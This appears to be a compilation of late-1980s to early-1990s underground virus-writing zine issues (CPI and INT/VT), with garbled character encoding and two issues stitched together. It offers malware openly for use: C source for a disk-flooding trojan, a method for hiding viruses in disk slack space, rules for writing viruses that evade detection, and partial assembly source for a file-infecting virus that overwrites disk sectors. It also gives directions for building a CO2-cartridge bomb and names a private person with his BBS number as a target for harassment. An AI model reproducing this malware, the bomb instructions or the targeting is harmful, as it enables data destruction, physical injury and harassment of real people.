2194 lines
97 KiB
Plaintext
2194 lines
97 KiB
Plaintext
[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
|
||
* *
|
||
* @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
|
||
* @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
|
||
* @@@@ @@@@ @@@@ @@@@ @@@ *
|
||
* @@@ @@@ @@@@ @@@ *
|
||
* @@@ @@@@@@@@@@@@@@@ @@@ *
|
||
* @@@ @@@@@@@@@@@@@@ @@@ *
|
||
* @@@ @@@ @@@ *
|
||
* @@@@ @@@@ @@@ @@@ *
|
||
* @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
|
||
* @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
|
||
* *
|
||
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
|
||
|
||
C O R R U P T E D
|
||
|
||
P R O G R A M M I N G
|
||
|
||
I N T E R N A T I O N A L
|
||
|
||
|
||
|
||
presents:
|
||
|
||
|
||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
@ @
|
||
@ Virili And Trojan Horses @
|
||
@ @
|
||
@ A ProtagonistYs Point Of View @
|
||
@ @
|
||
@ Issue #2 @
|
||
@ @
|
||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
DISCLAIMER::All of the information contained in this newsletter reflects the
|
||
thoughts and ideas of the authors, not their actions. The sole
|
||
purpose of this document is to educate and spread information.
|
||
Any illegal or illicit action is not endorsed by the authors or
|
||
CPI. The authors and CPI are not responsible for any information
|
||
which may present itself as old or mis-interpreted, and actions
|
||
by the reader. Remember, ZJust Say No!Y
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
|
||
|
||
|
||
|
||
|
||
Introduction To CPI#2
|
||
---------------------
|
||
Well, here is the olong awaited@ second issue of CPI, A ProtagonistYs Point
|
||
of view. This issue should prove a bit interesting, I dunno, but at least
|
||
entertaining for the time it takes to read. Enjoy the information and donYt
|
||
forget the disclaimer.
|
||
Oh yes, if you have some interesting articles or an application to send
|
||
us, just see the BBS list at the end of this document. Thanx. All applications
|
||
and information will be voted on through the CPI Inner Circle. Hope you enjoy
|
||
this issue as much as we enjoyed typing it... hehe...
|
||
Until our next issue, (which may be whenever), good-bye.
|
||
|
||
Doctor Dissector
|
||
|
||
|
||
Table of Contents
|
||
-----------------
|
||
Part Title Author
|
||
-----------------------------------------------------------------------------
|
||
2.1 Title Page, Introduction, & TOC....................... Doctor Dissector
|
||
2.2 Another Explanation Of Virili And Trojans............. Acid Phreak
|
||
2.3 V-IDEA-1.............................................. Ashton Darkside
|
||
2.4 V-IDEA-2.............................................. Ashton Darkside
|
||
2.5 The Generic Virus..................................... Doctor Dissector
|
||
2.6 Aids.................................................. Doctor Dissector
|
||
2.7 Batch File Virus...................................... PHUN 3.2
|
||
2.8 Basic Virus........................................... PHUN 3.2
|
||
2.9 The Alemeda Virus..................................... PHUN 4.3
|
||
2.10 Virili In The News.................................... Various Sources
|
||
2.11 Application For CPI................................... CPI Inner Circle
|
||
(CPI Node Phone #Ys Are In 2.11)
|
||
|
||
|
||
=========================================================================
|
||
Subject: INTVT Issue 2 1/1
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
|
||
The International Network of Thieves 2/16/91
|
||
Virus and Trojan Oriented
|
||
Volume No. 2
|
||
|
||
Welcome back! Hey guys, (and gals I hope!) error in last issue, the date
|
||
was incorrect. The actual date of INT/VT1.TXT should have been 1/29/91. Sorry
|
||
dudez, had some people think it was a year old... Ok, geez, already issue two?
|
||
You people have been waiting for it haven't you? GOOD!
|
||
|
||
VERY IMPORTANT NEWS!
|
||
--------------------
|
||
Gene Dunn, (handle is Unimax) a PD'er and Virus hater is on the prowl. He
|
||
has called The Edge of Destruction(817-473-3621) many times, and actually came
|
||
over to MY house once. He is threatening to take me to court. He got a virus
|
||
on his PD BBS and wants The EoD shut down because of its virus support, and
|
||
because it is the home of INT/VT!!!! This man is a mad man. I won't take the
|
||
BBS down! But if the court says so, oh well! HEY! THIS GUY IS THREATENING THE
|
||
HOME OF INT/VT!!! His name again is GENE DUNN,(Actually Eugene I believe) and
|
||
the number to his BBS is 817-834-0143. What you do with that info is up to you.
|
||
|
||
DISCLAIMER
|
||
----------
|
||
The writers of this article, nor the sysops of The EoD, are responsible for
|
||
what you do with the information found/discussed here. You the user/reader of
|
||
this are soley responsible for what you do with this information, as it is
|
||
provided for programming research only, and not for ANY illegal uses.
|
||
|
||
HOW WAS LESSON ONE?
|
||
-------------------
|
||
How did everyone do on your first lesson? Did you try it? On what? I'd
|
||
really enjoy it if you'd call The EoD and leave me mail about it. Also, if you
|
||
plan to continue with these issues and do the examples, I would recommend that
|
||
you get a copy of flushot(also available on The EoD), so as to watch the
|
||
virii/trojans as they work.
|
||
|
||
INT/VT APPLICATION
|
||
------------------
|
||
In this issue of INT/VT we will be including an application for joining our
|
||
association. Please fill it out and upload it to the SYSOP UPLOADS on The Edge
|
||
of Destruction BBS, 817-473-3621. You will be notified via E-Mail of your
|
||
status as a member. Thank You.
|
||
|
||
SOME INFORMATION ABOUT DEBUG
|
||
----------------------------
|
||
Since not everyone has Turbo Debugger, sNOOp, or some of the nicer
|
||
de-buggers, we're going to stick with using the DOS debug. Those of you who
|
||
already write virii and or are familiar with debug, you may want to skip this
|
||
section and pick up later down in the article. This is for the beginners to
|
||
debug. Here are some of the basic listing of commands for debug:
|
||
|
||
COMMAND / USAGE / COMMENTS
|
||
A A[address] A0100:0100 Start assembling at address 0100:0100
|
||
In most cases A0100 is all that is neccessary.
|
||
C C[range address] CC100,1FF 300 Compare portion of memory
|
||
D D[range] D0100 Displays the contents of memory at 0100
|
||
E E[address] E0100 Start entering byte values at 0100
|
||
F F[range list] F0100 L 100 fill 100 bytes
|
||
G G[address] G runs the current program
|
||
H H[values] H 100 108 ads and subtracts hex numbers
|
||
I I[value] I2F8 input one byte from port specified
|
||
L L[address] Load
|
||
M M[range address] move blocks of memory
|
||
N N[name] Names file (i.e. N Joe.exe)
|
||
O O[value byte] sends specified byte to output port
|
||
Q Q Terminates Debug
|
||
R R[register] Shows the register and edit it
|
||
S S[range list] Search the specified range for bytes
|
||
T T Trace through program
|
||
U U[address] Unnassemble at address x, u0100
|
||
W W[amt. of bytes] Save to disk
|
||
|
||
While these are not explained in great detail, it is not neccessary to
|
||
do so at this time, but as we use them it will be. I recommend you go to the
|
||
bookstore and purchase Peter Norton's Guide to Assembly Language. It will run
|
||
you about $25.00 and then download MASM5.0 from The EoD. MASM stand for
|
||
Microsoft Assembler, for you who are new to this. Also available are Turbo C
|
||
and Turbo C++ v2.00 and Turbo Pascal v6.00. Feel free to call and D/L these
|
||
files. Reading Peter Norton's book will make what you find here much easier.
|
||
Also, it will teach you how to program in assembler. Something we DO NOT plan
|
||
to do here, but to sharpen your knowledge, or HELP you learn it. Something else
|
||
you need is the BOOK of INT's. Soon to be available on The EoD.
|
||
|
||
LESSON 2, ANOTHER SIMPLE TROJAN IN C
|
||
------------------------------------
|
||
Our last trojan was in ASM, this one is in C. And known as Crazy. What it
|
||
does is makes tons of directories on someones HD. You say, "ooo, big deal."
|
||
Exactly, its a VERY BIG deal. In DOS, you can not remove more than one DIR at a
|
||
time. Can you imagine removing all of those DIR's by hand? It could take
|
||
weeks, months, or years.
|
||
|
||
|
||
/* Thanks to Ninja Wala of SUP for writing such a niftey trojan! */
|
||
|
||
|
||
|
||
#include <stdio.h>
|
||
#include <stdlib.h> /* Include Files */
|
||
#include <dir.h> /* Used by C to make life easier */
|
||
|
||
main()
|
||
{
|
||
int i,j; /* Names I and J as variables */
|
||
char tmp[20];
|
||
char far *ptr;
|
||
|
||
for (i=0;i<=50;i++){ /* random loop to make dirs */
|
||
srand(rand());
|
||
ptr = itoa(rand(),tmp,10);
|
||
mkdir ( ptr ); /* makes the DIR */
|
||
chdir ( ptr );
|
||
for (j=0;j<=50;j++){
|
||
ptr = itoa(rand(),tmp,10);
|
||
mkdir( ptr );
|
||
}
|
||
chdir ("\\");
|
||
}
|
||
}
|
||
|
||
While we are not going deep into how this works, we give you the source
|
||
so you can compile it and have some real nice fun killing an HD. If you would
|
||
like the compiled version (EXE version) you can get it off of many BBS's
|
||
including The EoD.
|
||
|
||
NEXT ISSUE
|
||
----------
|
||
In the next issue we will actually look at the inner workings of a virus.
|
||
Rather than a trojan. As to which virus, we can not be sure at this time.
|
||
Also, we will start our virus description and fake virus section.
|
||
|
||
JUST FOR ANARCHISTS - CO2 Cartidge Bomb!
|
||
----------------------------------------
|
||
Ok dudez, here is a nice mailbox or toilet bomb. Let the air out of the
|
||
CO2 cartridge, I don't care how. Use a nail, knife, screwdriver, or whatever
|
||
else to make the hole a bit bigger. Fill it with gunpowder and pack it down by
|
||
tapping the bottom of the CO2 cartridge on a hard surface. Insert a fuse, (I
|
||
recommend a good waterproof cannon fuse, but a firecracker fuse will work if its
|
||
all you can find.) Use something that seals real hard and tight. I have used
|
||
silicon before, but I think you cand find something that will try much harder if
|
||
you look. Find your destination. Light it. RUN! FAST! If it blows with you
|
||
near it. Better be a hospital near. I flushed one down a toilet at a Fina
|
||
Station and the Toilet CRACKED and started leaking. Not to mention water was
|
||
everywhere! Dripping from the ceiling and the walls.
|
||
|
||
CALL OUR HOME WORLD
|
||
-------------------
|
||
Call our HQ BBS: The Edge of Destruction - 817-473-3621
|
||
|
||
APOLOGY
|
||
-------
|
||
We realize that this issue was not as informative as some of you were
|
||
hoping. The reason for this is the problem of Gene Dunn. We have had little or
|
||
no time to donate to INT/VT due to his insanity. We hope to have a MUCH, MUCH
|
||
more interesting Issue as Issue 3. Which you should see in about 1-2 weeks.
|
||
|
||
Subject: CPI Issue 2 2/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
[2.2]
|
||
Explanation of Viruses and Trojans Horses
|
||
-----------------------------------------
|
||
Written by Acid Phreak
|
||
|
||
Like itYs biological counterpart, a computer virus is an agent of
|
||
infection, insinuating itself into a program or disk and forcing its host
|
||
to replicate the virus code. Hackers fascinated by the concept of oliving@
|
||
code wrote the first viruses as projects or as pranks. In the past few
|
||
years, however, a different kind of virus has become common, one that lives
|
||
up to an earlier meaning of the word: in Latin, virus means poison.
|
||
These new viruses incorporate features of another type of insidious
|
||
program called a Trojan horse. Such a program masquerades as a useful
|
||
utility or product but wreaks havoc on your system when you run it. It may
|
||
erase a few files, format your disk, steal secrets--anything software can
|
||
do, a Trojan horse can do. A malicious virus can do all this then attempt
|
||
to replicate itself and infect other systems.
|
||
The growing media coverage of the virus conceptand of specific viruse
|
||
has promoted the development of a new type of software. Antivirus programs,
|
||
vaccines--they go by many names, but their purpose is to protect from virus
|
||
attack. At present there are more antivirus programs than known viruses
|
||
(not for long).
|
||
Some experts quibble about exactly what a virus is. The most widely
|
||
known viruses, the IBM Xmas virus and the recent Internet virus, are not
|
||
viruses according to some experts because they do not infect other programs.
|
||
Others argue that every Trojan horse is a virus--one that depends completely
|
||
on people to spread it.
|
||
|
||
How They Reproduce:
|
||
-------------------
|
||
Viruses canYt travel without people. Your PC will not become infected
|
||
unless someone runs an infected program on it, whether accidentally or on
|
||
purpose. PCYs are different from mainframe networks in this way--the
|
||
mainframe Internet virus spread by transmitting itself to other systems and
|
||
ordering them to execute it as a program. That kind of active transmission
|
||
is not possible on a PC.
|
||
Virus code reproduces by changing something in your system. Some viruses
|
||
strike COMMAND.COM or the hidden system files. Others, like the notorious
|
||
Pakistani-Brain virus, modify the boot sector of floppy disks. Still others
|
||
attach themselves to any .COM or .EXE file. In truth, any file on your
|
||
system that can be executed--whether itYs a program, a device driver, an
|
||
overlay, or even a batch file--could be the target of a virus.
|
||
When an infected program runs, the virus code usually executes first and
|
||
then transfers control to the original program. The virus may immediately
|
||
infect other programs, or it may load itself into RAM and continue spreading.
|
||
If the virus can infect a file that will be used on another system, it has
|
||
succeeded.
|
||
|
||
What They Can Do:
|
||
-----------------
|
||
Viruses go through two phases: a replication phase and an action phase.
|
||
The action doesnYt happen until a certain even occurs--perhaps reaching a
|
||
special date or running the virus a certain number of times. It wouldnYt
|
||
make sense for a virus to damage your system the first time it ran; it needs
|
||
some time to grow and spread first.
|
||
The most vulnerable spot for a virus attack is your hard diskYs file
|
||
allocation table (FAT). This table tells DOS where every fileYs data resides
|
||
on the disk. Without the FAT, the dataYs still there but DOS canYt find it.
|
||
A virus could also preform a low-level format on some or all the tracks of
|
||
your hard disk, erase all files, or change the CMOS memory on AT-class
|
||
computers so that they donYt recognize the hard disk.
|
||
Most of the dangers involve data only, but itYs even possible to burn
|
||
out a monochrome monitor with the right code.
|
||
Some virus assaults are quite subtl. One known virus finds four
|
||
consecutive digits on the screen and switches two. LetYs hope youYre not
|
||
balancing the companyYs books when this one hits. Others slow down system
|
||
operations or introduce serious errors.
|
||
|
||
|
||
Subject: CPI Issue 2 3/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
[2.3]
|
||
-------------------------------------------------------------------------------
|
||
______ ________ ___________
|
||
/ ____ \ | ____ \ |____ ____|
|
||
| / \_| | | \ | | |
|
||
| | | |_____| | | |
|
||
| | | ______/ | |
|
||
| | _ | | | |
|
||
| \____/ | /\ | | /\ ____| |____ /\
|
||
\______/ \/ |_| \/ |___________| \/
|
||
|
||
|
||
oWe ainYt the phucking Salvation Army.@
|
||
|
||
-------------------------------------------------------------------------------
|
||
|
||
|
||
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
|
||
|
||
* * * present * * *
|
||
|
||
oOk, IYve written the virus, now where the hell do I put it?@
|
||
|
||
By Ashton Darkside (DUNE / SATAN / CPI)
|
||
|
||
|
||
*******************************************************************************
|
||
DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES
|
||
ONLY! The author does NOT condone the use of this information in any manner
|
||
that would be illegal or harmful. The fact that the author knows and spreads
|
||
this information in no way suggests that he uses it. The author also accepts
|
||
no responsibility for the malicious use of this information by anyone who
|
||
reads it! Remember, we may talk alot, but we ojust say no@ to doing it.
|
||
*******************************************************************************
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
Ok, wow! YouYve just invented the most incredibly nifty virus. It
|
||
slices, it dices, it squshes, it mushes (sorry Berke Breathed) peopleYs data!
|
||
But the only problem is, if you go around infecting every damn file, some cute
|
||
software company is going to start putting in procedures that checksum their
|
||
warez each time they run, which will make life for your infecting virus a total
|
||
bitch. Or somebodyYs going to come up with an incredibly nifty vaccination util
|
||
that will wipe it out. Because, i mean, hey, when disk space starts vanishing
|
||
suddenly in 500K chunks people tend to notice. Especially people like me that
|
||
rarely have more than 4096 bytes free on their HD anyway. Ok. So youYre saying
|
||
owow, so what, I can make mine fool-proof@, etc, etc. But wait! ThereYs no need
|
||
to go around wasting your precious time when the answer is right there in front
|
||
of you! Think about it, you could be putting that time into writing better and
|
||
more inovative viruses, or you could be worring about keeping the file size,
|
||
the date & time, and the attributes the same. With this system, you only need
|
||
to infect one file, preferably one thatYs NOT a system file, but something that
|
||
will get run alot, and will be able to load your nifty virus on a daily basis.
|
||
This system also doesnYt take up any disk space, other than the loader. And the
|
||
loader could conceivably be under 16 bytes (damn near undetectable). First of
|
||
all, you need to know what programs to infect. Now, everybody knows about using
|
||
COMMAND.COM and thatYs unoriginal anyway, when there are other programs people
|
||
run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or
|
||
WordPerfect; you get the idea. Better still are dos commands like Format, Link
|
||
or even compression utilities. But you get the point. Besides, whoYs going to
|
||
miss 16 bytes, right? Now, the good part: where to put the damn thing. One note
|
||
to the programmer: This could get tricky if your virus is over 2k or isnYt
|
||
written in Assembly, but the size problem is easy enough, it would be a simple
|
||
thing to break your virus into parts and have the parts load each other into
|
||
the system so that you do eventually get the whole thing. The only problem with
|
||
using languages besides assembly is that itYs hard to break them up into 2k
|
||
segments. If you want to infect floppys, or smaller disks, youYd be best off to
|
||
break your file into 512 byte segments, since theyYre easier to hide. But, hey,
|
||
in assembly, you can generate pretty small programs that do alot, tho. Ok, by
|
||
now youYve probably figured out that weYre talking about the part of the disk
|
||
called Zthe slackY. Every disk that your computer uses is divided up into parts
|
||
called sectors, which are (in almost all cases) 512 bytes. But in larger disks,
|
||
and even in floppies, keeping track of every single sector would be a complete
|
||
bitch. So the sectors are bunched together into groups called ZclustersY. On
|
||
floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard
|
||
disks, theyYre typically 4096 bytes, or eight sectors. Now think about it, you
|
||
have programs on your hard disk, and what are the odds that they will have
|
||
sizes that always end up in increments of 4096? If IYve lost you, think of it
|
||
this way: the file takes up a bunch of clusters, but in the last cluster it
|
||
uses, there is usually some ZslackY, or space that isnYt used by the file. This
|
||
space is between where the actual file ends and where the actual cluster ends.
|
||
So, potentially, you can have up to 4095 bytes of ZslackY on a file on a hard
|
||
disk, or 1023 bytes of ZslackY on a floppy. In fact, right now, run the Norton
|
||
program ZFS /S /TY command from your root directory, and subtract the total
|
||
size of the files from the total disk space used. ThatYs how much ZslackY space
|
||
is on your disk (a hell of alot, even on a floppy). To use the slack, all you
|
||
need to do is to find a chunk of slack big enough to fit your virus (or a
|
||
segment of your virus) and use direct disk access (INT 13) to put your virus
|
||
there. There is one minor problem with this. Any disk write to that cluster
|
||
will overwrite the slack with ZgarbageY from memory. This is because of the way
|
||
DOS manages itYs disk I/O and it canYt be fixed without alot of hassles. But,
|
||
there is a way around even this. And it involves a popular (abeit outdated and
|
||
usually ineffectual) form of virus protection called the READ-ONLY flag. This
|
||
flag is the greatest friend of this type of virus. Because if the file is not
|
||
written to, the last cluster is not written to, and voila! Your virus is safe
|
||
>from mischivious accidents. And since the R-O flag doesnYt affect INT 13 disk
|
||
I/O, it wonYt be in your way. Also, check for programs with the SYSTEM flag set
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
because that has the same Read-only effect (even tho I havenYt seen it written,
|
||
itYs true that if the file is designated system, DOS treats it as read-only,
|
||
whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM
|
||
in MS-DOS (not PC-DOS, it uses different files, or so I am told; IYve been too
|
||
lazy to find out myself) or a protected (!) COMMAND.COM file in either type of
|
||
DOS would be ideal for this. All you have to do is then insert your loader into
|
||
some innocent-looking file, and you are in business. All your loader has to do
|
||
is read the sector into the highest part of memory, and do a far call to it.
|
||
Your virus cann then go about waiting for floppy disks to infect, and place
|
||
loaders on any available executable file on the disk. Sound pretty neet? It is!
|
||
Anyway, have fun, and be sure to upload your virus, along with a README file on
|
||
how it works to CPI Headquarters so we can check it out! And remember: donYt
|
||
target P/H/P boards (thatYs Phreak/Hack/Pirate boards) with ANY virus. Even if
|
||
the Sysop is a leech and you want to shove his balls down his throat. Because
|
||
if all the PHP boards go down (especially members of CPI), who the hell can you
|
||
go to for all these nifty virus ideas? And besides, itYs betraying your own
|
||
people, which is uncool even if you are an anarchist. So, target uncool PD
|
||
boards, or your bossYs computer or whatever, but donYt attack your friends.
|
||
Other than that, have phun, and phuck it up!
|
||
|
||
Ashton Darkside
|
||
Dallas Underground Network Exchange (DUNE)
|
||
Software And Telecom Applicaitons Network (SATAN)
|
||
Corrupted Programmers International (CPI)
|
||
|
||
|
||
PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk).
|
||
|
||
Call these boards because the sysops are cool:
|
||
Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader)
|
||
System: Utopia (SATAN HQ) Sysop: RobbinY Hood (SATAN leader)
|
||
The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader)
|
||
D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader)
|
||
The Jolly BardsmenYs Pub & Tavern
|
||
The Sierra Crib
|
||
The Phrozen Phorest
|
||
Knight ShadowYs Grotto
|
||
|
||
And if I forgot your board, sorry, but donYt send me E-mail bitching about it!
|
||
|
||
|
||
Subject: CPI Issue 2 4/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
[2.4]
|
||
-------------------------------------------------------------------------------
|
||
______ ________ ___________
|
||
/ ____ \ | ____ \ |____ ____|
|
||
| / \_| | | \ | | |
|
||
| | | |_____| | | |
|
||
| | | ______/ | |
|
||
| | _ | | | |
|
||
| \____/ | /\ | | /\ ____| |____ /\
|
||
\______/ \/ |_| \/ |___________| \/
|
||
|
||
|
||
oWe ainYt the phucking Salvation Army.@
|
||
|
||
-------------------------------------------------------------------------------
|
||
|
||
|
||
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
|
||
|
||
* * * present * * *
|
||
|
||
CPI Virus Standards - Protect yourself and your friends
|
||
|
||
By Ashton Darkside (DUNE / SATAN / CPI)
|
||
|
||
|
||
*******************************************************************************
|
||
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
|
||
ONLY! The author does NOT condone the use of this information in any manner
|
||
that would be illegal or harmful. The fact that the author knows and spreads
|
||
this information in no way suggests that he uses it. The author also accepts
|
||
no responsibility for the malicious use of this information by anyone who
|
||
reads it! Remember, we may talk alot, but we ojust say no@ to doing it.
|
||
*******************************************************************************
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
One of the main problems with viruses is that once you set one loose,
|
||
it is no longer under your control. I propose to stop this by introducing some
|
||
standards of virus writing that will enable them to be deactivated whenever
|
||
they enter a ZfriendlyY (CPI) system. In the long run, even the author of the
|
||
virus is not immune to being attacked. The following are what I have termed the
|
||
CPI standards for writing viruses. They will allow a virus to easily check any
|
||
system they are being run on for a type of Zidentity badgeY. If it is found,
|
||
the virus will not infect the system it is being run on. The other standards
|
||
are mostly written around this.
|
||
|
||
CPI Standards for writing viruses -
|
||
|
||
1 - The virus will have an Zactive periodY and an Zinactive periodY.
|
||
The active periods will be no more than one year in length (to make
|
||
it more difficult to discover the virus). You may release different
|
||
versions of your virus with different Zactive periodsY. It is not
|
||
recommended that your virus deactivate itself after the set active
|
||
period, as this would enable people to deactivate viruses by using
|
||
their computer with the date set to 2069 or something. It is also
|
||
required that activation periods begin on January 1 and end on
|
||
December 31. This will coincide with the changing identity codes.
|
||
|
||
2 - The virus will check for an identity code by executing Interrrupt
|
||
12h with the following register settings: AX - 4350, BX - 4920,
|
||
CX - AB46, DX - 554E. If the system is friendly, then a pointer
|
||
will be returned in CX:DX to an ASCIIZ (0-terminated) string which
|
||
will have different contents in different years. The codes are not
|
||
to be included in any text file, and should only be given through
|
||
E-mail on CPI affiliated systems. You can always ask me by sending
|
||
me mail at The Andromeda Strain BBS. If a system is detected as
|
||
friendly, the virus will not attempt to infect or damage it, but it
|
||
is ok to display a little greeting message about how lucky the
|
||
user was.
|
||
|
||
3 - We very much encourage you to upload your virus, along with a breif
|
||
description on the workings into the CPI section at The Andromeda
|
||
Strain BBS. Only CPI members will know about your virus. This is
|
||
so that CPI members can share techniques and it also allows us to
|
||
verify that the identity check works. If we see any improvements
|
||
that could be made, such as ways to streamline code, better ways of
|
||
spreading, etc. we will inform you so that you can make the changes
|
||
if you wish.
|
||
|
||
4 - It is also suggested that you use ADS standard for virus storage on
|
||
infected disks. This meathod uses disk slack space for storage and
|
||
is more thoroughly described in a previous text file by me. I think
|
||
that this is the most effective and invisible way to store viruli.
|
||
|
||
5 - A list of CPI-Standard viruli will be avaliable at all times from
|
||
The Andromeda Strain BBS, to CPI users. Identity strings will also
|
||
be available to anyone in CPI, or anyone who uploads source code to
|
||
a virus which is 100% complete except for the Identity string (it
|
||
must be written to CPI-Standards). Non-CPI members who do this will
|
||
be more seriously considered for membership in CPI.
|
||
|
||
Ashton Darkside
|
||
Dallas Underground Network Exchange (DUNE)
|
||
Software And Telecom Applications Network (SATAN)
|
||
Corrupted Programmers International (CPI)
|
||
|
||
PS: This file (by itself) has approx 2.5k of slack.
|
||
|
||
|
||
Subject: CPI Issue 2 5/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
;=============================================================================
|
||
;
|
||
; C*P*I
|
||
;
|
||
; CORRUPTED PROGRAMMING INTERNATIONAL
|
||
; -----------------------------------
|
||
; p r e s e n t s
|
||
;
|
||
; T H E
|
||
; _ _
|
||
; (g) GENERIC VIRUS (g)
|
||
; ^ ^
|
||
;
|
||
;
|
||
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
|
||
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
|
||
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR oPROGRAM TO BIG TO
|
||
; FIT IN MEMORY@ THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
|
||
;
|
||
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
|
||
; THE DISK. HAVE PHUN WITH THIS ONE.
|
||
;
|
||
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
|
||
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
|
||
;
|
||
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
|
||
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
|
||
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
|
||
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
|
||
;
|
||
; DOCTOR DISSECTOR
|
||
; CPI ASSOCIATES
|
||
;
|
||
;=============================================================================
|
||
|
||
MAIN:
|
||
NOP ;| Marker bytes that identify this program
|
||
NOP ;| as infected/a virus
|
||
NOP ;|
|
||
|
||
MOV AX,00 ;| Initialize the pointers
|
||
MOV ES:[POINTER],AX ;|
|
||
MOV ES:[COUNTER],AX ;|
|
||
MOV ES:[DISKS B],AL ;|
|
||
|
||
MOV AH,19 ;| Get the selected drive (dir?)
|
||
INT 21 ;|
|
||
|
||
MOV CS:DRIVE,AL ;| Get current path (save drive)
|
||
MOV AH,47 ;| (dir?)
|
||
MOV DH,0 ;|
|
||
ADD AL,1 ;|
|
||
MOV DL,AL ;| (in actual drive)
|
||
LEA SI,CS:OLD_PATH ;|
|
||
INT 21 ;|
|
||
|
||
MOV AH,0E ;| Find # of drives
|
||
MOV DL,0 ;|
|
||
INT 21 ;|
|
||
CMP AL,01 ;| (Check if only one drive)
|
||
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
|
||
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)
|
||
|
||
HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
|
||
LEA BX,SEARCH_ORDER ;|
|
||
ADD BX,AX ;|
|
||
ADD BX,0001 ;|
|
||
MOV CS:POINTER,BX ;|
|
||
CLC ;|
|
||
|
||
CHANGE_DISK: ;| Carry is set if no more .COM files are
|
||
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
|
||
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
|
||
LEA DX,CS:MASKE_EXE ;| but will cause the error message oProgram
|
||
INT 21 ;| to large to fit in memory@ when starting
|
||
CMP AL,0FF ;| larger infected programs
|
||
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)
|
||
|
||
MOV AH,2CH ;| If neither .COM or .EXE files can be found,
|
||
INT 21 ;| then random sectors on the disk will be
|
||
MOV BX,CS:POINTER ;| overwritten depending on the system time
|
||
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
|
||
MOV BX,DX ;| complete oinfection@ of a storage medium.
|
||
MOV CX,2 ;| The virus can find nothing more to infect
|
||
MOV DH,0 ;| starts its destruction.
|
||
INT 26 ;| (write crap on disk)
|
||
|
||
NO_NAME_CHANGE: ;| Check if the end of the search order table
|
||
MOV BX,CS:POINTER ;| has been reached. If so, end.
|
||
DEC BX ;|
|
||
MOV CS:POINTER,BX ;|
|
||
MOV DL,CS:[BX] ;|
|
||
CMP DL,0FF ;|
|
||
JNZ HUPS2 ;|
|
||
JMP HOPS ;|
|
||
|
||
HUPS2: ;| Get a new drive from the search order table
|
||
MOV AH,0E ;| and select it, beginning with the ROOT dir.
|
||
INT 21 ;| (change drive)
|
||
MOV AH,3B ;| (change path)
|
||
LEA DX,PATH ;|
|
||
INT 21 ;|
|
||
JMP FIND_FIRST_FILE ;|
|
||
|
||
FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
|
||
MOV AH,17 ;| first subdir. First, (change .exe to .com)
|
||
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
|
||
INT 21 ;| old directory.
|
||
MOV AH,3B ;| (use root directory)
|
||
LEA DX,PATH ;|
|
||
INT 21 ;|
|
||
